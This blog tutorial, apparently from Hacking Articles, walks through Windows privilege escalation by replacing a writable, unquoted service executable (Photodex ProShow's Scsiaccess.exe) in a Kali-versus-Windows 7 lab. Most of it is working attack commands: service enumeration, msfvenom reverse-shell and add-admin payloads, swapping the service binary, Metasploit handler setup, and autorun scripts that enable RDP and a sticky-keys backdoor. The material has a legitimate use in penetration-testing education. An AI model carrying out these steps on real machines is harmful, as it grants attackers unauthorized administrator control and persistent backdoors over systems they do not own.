Subscribe to Blog via Email



Privilege Escalation

Windows Privilege Escalation (Insecure File Permissions)

In this article, we are demonstrating Windows privilege escalation via Insecure File Permissions.  In penetration testing when we spawn command shell as a local user, it is not possible to check restricted file or folder, therefore we need to escalated privileges to get administrators access.

Table of Content

  • Introduction
  • Lab setup
  • Spawn command shell as local user
  • Escalated privilege via Prepend-migrate
  • Escalated privilege via Adding user Administrators Group
  • Escalated privilege via RDP & Sticky_keys

Insecure File Permissions


The vulnerability is related to the path of the executable that has a space in the filename and the file name is not enclosed in quote tags (“”). Also, if it has writable permissions, then an attacker can replace the executable file with its malicious exe file, so as to escalate admin privileges.

Lab set-up

Victim’s Machine: Windows 7

Attacker’s machine: Kali Linux

First, we have downloaded and installed a Vulnerable application naming photodex proshow in our windows system, which we found under Exploit DB.

Spawning Victim’s Machine

We need to compromise the windows machine at least once to gain the meterpreter session. As you can observe we already have victim’s meterpreter session. Now let’s open the command shell from here.


As you can observe, we have shell access as local_user and to get cmd as administrator we need to escalate its privileges. Firstly we can enumerate out all the services that are running on the victim’s machine and discover those that are not bounded inside quotes tag with help of the following command:

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """

So we have enumerated following path: C:\Program Files\Photodex\ProShow Producer\Scsiaccess.exe as you can see, there is not quotes tag around the path and also space in the filename.

Now let’s identify the folder permissions using the following command:

icacls scsiaccess.exe

As you can observe it has writable permission for everyone which means user raj can overwrite this file.

Escalated privilege via Prepend-migrate

Now we can place any malicious exe file in the same folder that will give admin privilege when the service will be restarted, Windows will launch this executable instead of the genuine exe.

Open the terminal in kali Linux and type following command to generate exe payload using msfvenom.

msfvenom -p windows/meterpreter/reverse_tcp lhost= lport=1234 prependmigrate=true prependmigrateprocess=explorer.exe -f exe > /root/Desktop/scsiaccess.exe

Above command will create a malicious exe file on the Desktop and now send this file to the victim. The payload migrates its process if the current process gets killed; hence the attacker will not lose his session if the victim kills the current process ID of the payload from its system.

Now replace the genuine executable file from the malicious exe, here I have renamed genuine Scsiaccess.exe to Scsiaccess.exe.orginal and uploaded malicious Scsiaccess.exe in the same folder and then reboot the victim’s machine.

move scsiaccess.exe scsiaccess.exe.orginal
upload /root/Desktop/scsiaccess.exe .

Simultaneously we have start multi/handler listener in a new terminal to catch the meterpreter session with admin privilege.

use exploit/multi/handler
msf exploit(multi/handler) set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) set lhost
msf exploit(multi/handler) set lport 1234
msf exploit(multi/handler) exploit

Yuppie!! And after some time we got a shell with admin privileges.

Escalated privilege via Adding user Administrators Group

After spawning a shell as local_user, we enumerated all username list with or without admin privileges. So we found user:raaz is not a member of the admin group.

net user
net user raaz

So again we generated an exe file which will add user:raaz into administrators group. The name of our exe file will be same i.e. Scsiaccess.exe

msfvenom -p windows/exec CMD='net localgroup administrators raaz /add' -f exe > /root/Desktop/scsiaccess.exe

Now repeat the above steps, replace the genuine executable file from the malicious exe file and reboot the host machine.

If you will notice the following image, you can observe that the user raaz has become a member of the Administrators group.

Escalated privilege via RDP & Sticky_keys

Generate an exe using msfvenom with similar name Scsiaccess.exe and then transfer into victim’s machine, meanwhile run multi handler with autorun script which will enable RDP service once the service gets restarted.

use exploit/multi/handler
msf exploit(multi/handler) set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) set lhost
msf exploit(multi/handler) set lport 1234
msf exploit(multi/handler) set AutoRunScript post/windows/manage/enable_rdp
msf exploit(multi/handler) exploit

Similarly, we will set the autorun script to enable sticky_keys once the service restarts.

msf exploit(multi/handler) set AutoRunScript post/windows/manage/sticky_keys
msf exploit(multi/handler) run

As you can observe from the below screenshot, another meterpreter session (session 3) got opened which has administrative rights. Now let’s connect to the victim’s host via RDP.


Now press shift_key 5 times continuously and you will get command prompt as administrator.


Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here